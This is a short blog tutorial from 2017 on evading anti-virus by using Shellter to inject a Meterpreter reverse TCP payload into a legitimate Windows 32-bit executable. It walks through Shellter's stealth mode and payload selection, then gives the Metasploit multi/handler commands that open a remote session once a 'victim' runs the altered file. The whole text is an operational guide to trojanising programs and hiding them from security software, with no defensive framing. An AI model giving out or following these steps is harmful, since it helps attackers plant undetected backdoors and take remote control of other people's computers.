Thursday, July 27, 2017

Evading Anti-Virus Detection with Shellter


Anti-virus software is the last and only defense against malware on most personal computers, so getting past it or evading it is one of the most important steps in penetrating such systems. Payload encoding is one method attackers use to evade detection. You can use Metasploit's built-in encoders to encode your payloads, but most anti-virus solutions will detect those payloads, so alternatives are needed. Shellter is one of the available solutions.

Shellter can re-encode a Windows 32-bit application executable after injecting the payload or shellcode into it, so that anti-virus software will not be able to detect it.

Shellter is not built into Kali Linux, so you have to install it manually. You can either download Shellter from the project's website or install it with the command apt-get install shellter

Shellter is a Windows .exe file, so you need to install Wine to run it on Kali Linux if you don't have it already.
After the installations are done, choose the Windows 32-bit application you want to add the payload to and start Shellter.
Shellter will then open in another window.

Choose operation mode A, then provide the location of the Windows application. If you are currently in the same directory as the application, giving just the file name is enough; otherwise you will have to provide the absolute path.

Shellter will then make a backup copy of the original .exe file and start the process. When it prompts for the stealth mode option, select Y.
Next it displays a list of the native payloads available. You can either choose one from the list or supply your own payload to encode. For this example I will use the Meterpreter_reverse_tcp payload from the list. To use a payload from the list, press L and then enter the payload index.

When it prompts for LHOST, provide the IP address of your Kali Linux machine, and then provide a port number. Remember the port number, because you will need it when setting up the listener.

If everything was successful, Shellter will display a success message.

Now you need to set up a listener to catch the incoming connection from the payload.
Start Metasploit with the msfconsole command.
Select the handler with
use exploit/multi/handler
then select the payload with
set payload windows/meterpreter_reverse_tcp
The payload must be the same one you selected in Shellter.
Then set LHOST and LPORT to the same values you entered in Shellter and run the handler.
Whenever your victim executes the .exe containing the payload, you will get a Meterpreter session.
